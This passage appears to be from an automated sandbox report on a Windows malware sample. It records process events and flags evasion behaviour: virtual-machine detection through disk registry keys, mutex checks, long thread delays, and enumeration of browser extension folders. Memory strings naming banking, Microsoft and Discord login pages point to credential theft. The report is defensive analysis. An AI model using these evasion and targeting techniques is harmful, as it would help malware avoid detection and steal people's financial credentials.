            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Checks if the current machine is a virtual machine (disk enumeration)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Contains functionality to compare user and computer (likely to detect sandboxes)
            Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,18_2_00163862
            Found evasive API chain (may stop execution after checking mutex)
            Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_20-884
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7FFB2CECE814
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI/Special instruction interceptor: Address: 7FFB2CECD584
            Source: C:\Users\user\AppData\Roaming\uahuajdMemory allocated: 770000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdMemory allocated: 4470000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001616C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,18_2_001616C7
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3872Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5977Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 444Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3479Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 906Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3301Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 770Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 381Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 547Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 364
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4732Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3260Thread sleep time: -347900s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 1860Thread sleep time: -90600s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3260Thread sleep time: -330100s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajd TID: 6296Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3924Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4048Thread sleep count: 381 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 4048Thread sleep time: -381000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6196Thread sleep count: 547 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exe TID: 6196Thread sleep time: -547000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3944Thread sleep count: 364 > 30
            Source: C:\Windows\explorer.exe TID: 3944Thread sleep time: -364000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3968Thread sleep count: 71 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 3968Thread sleep time: -71000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 5528Thread sleep count: 148 > 30
            Source: C:\Windows\explorer.exe TID: 5528Thread sleep time: -148000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,14_2_00A02B15
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,14_2_00A01D4A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,14_2_00A03ED9
            Source: C:\Windows\explorer.exeCode function: 16_2_009B30A8 FindFirstFileW,FindNextFileW,FindClose,16_2_009B30A8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0080255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,17_2_0080255C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001615BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,18_2_001615BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001614D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,18_2_001614D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 18_2_001613FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,18_2_001613FE
            Source: C:\Windows\explorer.exeCode function: 19_2_009E1EB4 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1EB4
            Source: C:\Windows\explorer.exeCode function: 19_2_009E1DB0 FindFirstFileW,FindNextFileW,FindClose,19_2_009E1DB0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00A06512 GetSystemInfo,14_2_00A06512
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\uahuajdThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: explorer.exe, 0000000C.00000000.1503056802.0000000000C74000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
            Source: 53B.tmp.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 53B.tmp.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 53B.tmp.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: 53B.tmp.14.drBinary or memory string: outlook.office.comVMware20,11696492231s
            Source: 53B.tmp.14.drBinary or memory string: AMC password management pageVMware20,11696492231
            Source: 53B.tmp.14.drBinary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 53B.tmp.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: 53B.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 53B.tmp.14.drBinary or memory string: outlook.office365.comVMware20,11696492231t
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
            Source: 53B.tmp.14.drBinary or memory string: discord.comVMware20,11696492231f
            Source: explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWocal Storage\*.*B
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008DFE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: 53B.tmp.14.drBinary or memory string: global block list test formVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000009052000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
            Source: 53B.tmp.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 0000000E.00000003.1738110753.0000000000D20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|
            Source: 53B.tmp.14.drBinary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 53B.tmp.14.drBinary or memory string: tasks.office.comVMware20,11696492231o
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
            Source: 53B.tmp.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: explorer.exe, 0000000C.00000000.1504447706.0000000007306000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: 53B.tmp.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: explorer.exe, 0000000C.00000000.1506729663.0000000008F27000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWT`
            Source: explorer.exe, 0000000C.00000000.1503645926.0000000003249000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
